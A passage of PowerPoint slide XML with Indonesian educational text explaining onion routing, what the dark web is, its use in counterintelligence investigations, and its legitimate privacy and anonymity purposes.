              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perutean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bawang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan relay di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> node </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencapai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>anonimitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Dark Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-situs, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gelap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gelap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersembunyi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Akses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gelap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> URL-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>papan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>buletin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mulut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mulut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menyelidiki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gelap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>papan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intelijen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berharga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Anonimitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gelap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memudahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyelidik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyusup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> forum dan toko web yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertukar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>curian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peretasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ketika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>musuh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bereaksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyiapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyusupan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penegak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hukum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Akibatnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gelap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gelap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mewakili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lanskap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Harap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperhatikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berpartisipasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ilegal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gelap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilarang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Agar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berhati-hati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengikuti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panduan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hukum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>etika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjelajahi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gelap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Dark web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikaitkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlarang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ilegal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Privasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Anonimitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gelap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> platform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>anonimitas</a:t>
            </a:r>
            <a:r>
